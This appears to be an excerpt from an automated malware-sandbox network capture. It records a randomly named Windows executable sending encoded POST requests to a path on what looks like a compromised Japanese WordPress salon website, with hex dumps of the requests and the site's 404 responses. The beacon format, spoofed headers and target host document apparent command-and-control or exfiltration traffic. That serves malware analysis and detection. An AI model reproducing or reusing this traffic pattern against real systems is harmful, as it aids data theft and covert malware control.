                                                                                              Data Ascii: t/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji"
                                                                                              Apr 24, 2024 07:26:23.555588007 CEST1289INData Raw: 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 6e 28 65 2c 22 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5c 75 64 66 66 66 22 2c 22 5c 75 64 38 33
                                                                                              Data Ascii: "emoji":return!n(e,"\ud83e\udef1\ud83c\udffb\u200d\ud83e\udef2\ud83c\udfff","\ud83e\udef1\ud83c\udffb\u200b\ud83e\udef2\ud83c\udfff")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new
                                                                                              Apr 24, 2024 07:26:23.555622101 CEST1289INData Raw: 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73
                                                                                              Data Ascii: ew Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.suppo
                                                                                              Apr 24, 2024 07:26:23.555694103 CEST1289INData Raw: 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73
                                                                                              Data Ascii: esheet' id='wp-block-library-css' href='http://a-two-spa-salon.com/wp-includes/css/dist/block-library/style.min.css?ver=6.4.4' type='text/css' media='all' /><style id='classic-theme-styles-inline-css' type='text/css'>/*! This file is auto-ge
                                                                                              Apr 24, 2024 07:26:23.555732965 CEST1289INData Raw: 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 29 20 30 25 2c 72 67 62 28 30 2c 32 30 38 2c 31 33 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d
                                                                                              Data Ascii: yan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vi
                                                                                              Apr 24, 2024 07:26:23.555804014 CEST1289INData Raw: 65 67 2c 72 67 62 28 32 2c 33 2c 31 32 39 29 20 30 25 2c 72 67 62 28 34 30 2c 31 31 36 2c 32 35 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 3a 20 31 33 70 78 3b 2d 2d 77 70
                                                                                              Data Ascii: eg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--sp
                                                                                              Apr 24, 2024 07:26:23.555820942 CEST1289INData Raw: 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e
                                                                                              Data Ascii: in-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width
                                                                                              Apr 24, 2024 07:26:23.555886030 CEST1289INData Raw: 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f
                                                                                              Data Ascii: et--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivi
                                                                                              Apr 24, 2024 07:26:23.555938005 CEST1289INData Raw: 64 2d 61 6d 62 65 72 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28
                                                                                              Data Ascii: d-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important
                                                                                              Apr 24, 2024 07:26:23.829082012 CEST1289INData Raw: 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 6f 72 64
                                                                                              Data Ascii: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-b


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.449743157.7.107.63801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:26:26.677110910 CEST766OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.a-two-spa-salon.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.a-two-spa-salon.com
                                                                                              Referer: http://www.a-two-spa-salon.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 34 36 6a 39 69 4f 35 61 67 71 4d 35 72 76 35 46 37 30 4f 65 43 64 30 54 52 50 42 67 48 65 75 69 48 71 6b 64 4c 49 55 4b 4b 6e 35 31 66 65 56 2f 4f 6c 36 4f 57 73 31 2b 66 59 69 6f 35 4e 6a 54 6a 78 6e 6b 53 4e 74 6e 66 63 79 32 5a 79 2b 50 45 32 50 58 59 31 62 52 76 76 6a 6f 36 53 6e 54 2f 55 34 34 59 57 5a 56 57 6d 76 4a 58 46 31 55 30 56 41 61 4c 75 54 4d 78 77 4f 36 4c 52 46 61 2f 49 71 4d 47 72 33 31 46 4e 43 73 4e 37 74 57 34 55 55 36 6d 44 65 75 43 51 30 4c 70 52 49 56 54 38 46 64 44 77 63 73 59 6f 52 70 4d 61 68 52 5a 4b 6b 6f 6a 77 62 72 50 61 41 48 4a 57 78 53 56 75 5a 71 68 6a 35 75 7a 49 4b 2f 46 63 75 75 6c 53 4b 46 72 57 63 3d
                                                                                              Data Ascii: 12l42=46j9iO5agqM5rv5F70OeCd0TRPBgHeuiHqkdLIUKKn51feV/Ol6OWs1+fYio5NjTjxnkSNtnfcy2Zy+PE2PXY1bRvvjo6SnT/U44YWZVWmvJXF1U0VAaLuTMxwO6LRFa/IqMGr31FNCsN7tW4UU6mDeuCQ0LpRIVT8FdDwcsYoRpMahRZKkojwbrPaAHJWxSVuZqhj5uzIK/FcuulSKFrWc=
                                                                                              Apr 24, 2024 07:26:27.152697086 CEST1289INHTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:26:27 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Server: Apache
                                                                                              X-Powered-By: PHP/8.2.18
                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                              Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                                                              Data Raw: 33 62 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78
                                                                                              Data Ascii: 3b58<!DOCTYPE html><html class="pc" lang="ja"><head><meta charset="UTF-8">...[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]--><meta name="viewport" content="width=device-width"><title> | A-two </title><meta name="description" content=""><link rel="pingback" href="http://a-two-spa-salon.com/xmlrpc.php"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//a-two-spa-salon.com' /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/comments/feed/" /><script type="tex
                                                                                              Apr 24, 2024 07:26:27.152719021 CEST1289INData Raw: 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77
                                                                                              Data Ascii: t/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji"
                                                                                              Apr 24, 2024 07:26:27.152730942 CEST1289INData Raw: 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 6e 28 65 2c 22 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5c 75 64 66 66 66 22 2c 22 5c 75 64 38 33
                                                                                              Data Ascii: "emoji":return!n(e,"\ud83e\udef1\ud83c\udffb\u200d\ud83e\udef2\ud83c\udfff","\ud83e\udef1\ud83c\udffb\u200b\ud83e\udef2\ud83c\udfff")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new
                                                                                              Apr 24, 2024 07:26:27.152801991 CEST1289INData Raw: 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73
                                                                                              Data Ascii: ew Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.suppo
                                                                                              Apr 24, 2024 07:26:27.152880907 CEST1289INData Raw: 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73
                                                                                              Data Ascii: esheet' id='wp-block-library-css' href='http://a-two-spa-salon.com/wp-includes/css/dist/block-library/style.min.css?ver=6.4.4' type='text/css' media='all' /><style id='classic-theme-styles-inline-css' type='text/css'>/*! This file is auto-ge
                                                                                              Apr 24, 2024 07:26:27.152926922 CEST1289INData Raw: 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 29 20 30 25 2c 72 67 62 28 30 2c 32 30 38 2c 31 33 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d
                                                                                              Data Ascii: yan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vi
                                                                                              Apr 24, 2024 07:26:27.152955055 CEST1289INData Raw: 65 67 2c 72 67 62 28 32 2c 33 2c 31 32 39 29 20 30 25 2c 72 67 62 28 34 30 2c 31 31 36 2c 32 35 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 3a 20 31 33 70 78 3b 2d 2d 77 70
                                                                                              Data Ascii: eg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--sp
                                                                                              Apr 24, 2024 07:26:27.153042078 CEST1289INData Raw: 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e
                                                                                              Data Ascii: in-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width
                                                                                              Apr 24, 2024 07:26:27.153110981 CEST1289INData Raw: 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f
                                                                                              Data Ascii: et--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivi
                                                                                              Apr 24, 2024 07:26:27.153167009 CEST1289INData Raw: 64 2d 61 6d 62 65 72 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28
                                                                                              Data Ascii: d-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important
                                                                                              Apr 24, 2024 07:26:27.414510965 CEST1289INData Raw: 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 6f 72 64
                                                                                              Data Ascii: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-b


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.449744157.7.107.63801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:26:29.472825050 CEST10848OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.a-two-spa-salon.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.a-two-spa-salon.com
                                                                                              Referer: http://www.a-two-spa-salon.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 34 36 6a 39 69 4f 35 61 67 71 4d 35 72 76 35 46 37 30 4f 65 43 64 30 54 52 50 42 67 48 65 75 69 48 71 6b 64 4c 49 55 4b 4b 6b 5a 31 66 72 42 2f 50 43 75 4f 4d 73 31 2b 57 34 69 70 35 4e 69 42 6a 78 2f 6f 53 4e 68 64 66 65 36 32 57 78 6d 50 43 43 6a 58 53 31 62 52 33 66 6a 31 6e 69 6d 54 2f 55 6f 38 59 57 70 56 57 6d 76 4a 58 45 46 55 7a 41 30 61 4a 75 54 44 6e 41 4f 6d 64 68 45 46 2f 49 7a 35 47 72 7a 4c 43 39 69 73 4e 61 64 57 39 6d 38 36 35 7a 65 73 42 51 31 59 70 52 30 77 54 38 78 72 44 78 6f 43 59 72 4e 70 4f 74 63 56 50 4a 45 72 34 6a 47 74 62 59 63 42 46 6b 74 30 57 74 56 55 78 6a 52 43 75 38 4f 55 4a 72 44 32 31 52 65 36 32 79 53 65 67 37 69 75 2b 77 6e 34 2f 45 43 4e 30 57 47 64 7a 6f 76 68 71 46 48 68 61 4c 76 2b 44 6c 6f 57 4f 48 49 44 6a 66 4d 4c 64 4c 31 5a 36 46 78 6a 4e 76 44 41 5a 6f 50 31 49 47 45 51 49 43 2f 68 52 6c 42 79 4d 57 33 6a 49 64 54 4d 7a 46 32 47 43 63 6f 58 70 6b 6e 57 45 36 46 6a 7a 4b 4b 67 51 72 64 54 4a 34 65 6e 4a 72 74 34 6d 2b 54 70 68 49 37 65 41 4b 66 6b 57 47 41 73 2f 71 73 67 50 76 68 56 4c 53 50 4d 46 37 51 6b 70 58 71 48 44 66 76 38 69 69 77 37 43 30 44 73 42 35 33 39 6f 5a 48 4e 4d 70 58 33 68 32 4d 45 37 75 67 47 53 6e 64 5a 39 76 75 53 49 4e 54 58 6a 2f 51 45 31 39 5a 4e 4c 6a 30 33 77 4c 68 62 63 54 4a 63 64 70 7a 33 76 6d 70 4a 66 73 47 35 59 32 64 65 64 49 6b 70 43 49 57 36 33 68 75 74 69 6f 4a 53 70 52 66 49 57 36 68 44 4c 69 71 50 65 63 66 41 38 4d 69 55 66 2b 4b 38 32 46 79 4b 52 71 44 71 67 6a 4c 74 44 34 66 41 38 47 71 45 6a 38 7a 51 4b 2f 4a 67 30 48 37 56 64 57 48 4e 32 76 61 35 6d 79 54 52 6e 48 52 73 6f 56 73 7a 72 32 34 4c 64 38 6b 62 6f 4c 78 75 37 35 39 33 56 70 50 74 57 75 66 6f 6c 2f 62 61 48 39 79 56 4c 30 48 4a 4f 56 37 38 4c 35 55 72 4f 6a 7a 59 52 4d 61 6c 49 33 59 70 42 31 73 31 37 45 6c 64 63 73 52 50 77 51 4d 4d 63 67 4d 69 4f 5a 32 45 37 70 6a 43 77 63 64 42 52 2b 4e 49 6f 4e 30 6b 4d 2f 38 2f 46 6c 4f 55 6d 4a 67 57 57 33 38 57 46 2b 76 48 6a 33 59 51 54 31 72 77 62 65 4f 41 72 4b 50 73 36 70 75 35 62 51 4c 68 38 73 43 38 4c 62 33 6c 63 54 6c 69 58 46 6f 70 36 54 4c 76 45 56 4f 75 42 4a 4f 32 78 78 56 33 37 4a 64 42 30 50 4c 30 6c 78 79 50 35 67 46 70 74 6b 51 63 43 36 33 38 63 4e 75 53 66 49 53 51 50 46 73 43 7a 30 55 75 5a 65 5a 4b 2b 33 66 59 44 56 7a 73 63 39 6e 48 2f 46 39 34 65 4b 58 72 75 73 4b 54 4a 42 47 44 31 44 76 68 6e 32 39 67 38 78 4f 76 57 4a 7a 43 7a 45 45 73 78 70 51 4d 2b 39 59 44 53 61 6b 2f 44 32 72 41 48 37 58 58 4a 70 4f 55 70 53 48 72 59 4c 69 4d 44 75 53 2b 76 51 53 61 5a 39 7a 54 77 4e 54 38 46 71 6a 55 69 63 5a 4e 2b 41 4d 4c 4e 31 56 48 78 78 4d 72 75 52 54 4f 51 39 55 46 4f 70 55 4c 42 44 42 68 6f 77 64 64 53 30 31 44 76 74 56 76 54 2f 2f 68 59 64 65 73 34 69 71 6d 2f 79 45 53 53 4e 74 32 31 55 45 52 6d 6d 38 52 38 59 54 55 69 61 30 6b 4e 42 6b 7a 72 55 72 46 42 57 41 64 2b 75 33 64 37 47 57 5a 78 70 79 6e 36 65 4e 66 4b 6d 46 46 71 4f 54 4d 2b 37 64 57 66 4e 71 4c 6b 73 77 62 33 2f 66 67 56 43 44 70 42 6c 48 52 61 64 69 63 2b 59 47 71 36 4a 77 59 62 4f 61 4a 66 58 2f 50 78 32 54 36 78 68 43 4b 6b 34 62 2f 38 6c 6e 37 45 57 49 4e 7a 75 56 62 72 66 53 6c 74 33 54 32 58 2f 4b 71 6c 4c 53 4f 74 70 49 4e 66 4b 42 68 6e 47 4d 67 45 6e 44 53 51 52 44 6c 51 68 78 36 4f 58 55 39 79 33 58 77 4b 39 71 5a 72 4e 42 70 55 32 6e 4b 6b 38 47 56 67 6c 30 62 4e 5a 6d 55 47 56 41 32 67 2b 75 73 4d 61 30 6f 5a 44 31 6b 62 7a 50 39 35 7a 4f 36 49 72 70 47 4f 6e 61 58 64 6b 61 5a 76 4f 64 46 35 6e 46 33 7a 66 33 77 30 4d 39 52 6d 78 30 4f 7a 33 63 59 68 31 2f 47 2b 68 6d 64 37 56 32 63 45 52 74 2f 71 73 6f 57 55 32 5a 76 64 35 50 6e 72 74 47 48 30 73 35 34 56 6b 44 41 63 59 45 6e 39 67 43 6b 70 45 47 41 76 4f 59 59 74 58 33 36 33 72 44 62 78 54 73 53 32 4f 79 4a 62 57 4b 51 68 70 6b 53 71 56 5a 34 69 6f 38 51 38 45 64 79 47 41 72 4b 42 78 70 30 78 4f 4a 32 6c 46 52 2f 31 58 4a 68 45 51 77 6a 2f 48 4f 44 49 33 49 71 61 42 49 59 78 75 33 72 37 69 63 76 38 4e 32 2b 71 54 62 4d 70 76 51 57 47 44 79 46 36 64 5a 69 70 4b 59 38 70 76 4e 49 63 5a 38 51 7a 39 42 38 65 4b 78 6a 33 72 79 4d 44 2f 58 57 78 4d 31 34 42 6c 65 75 70
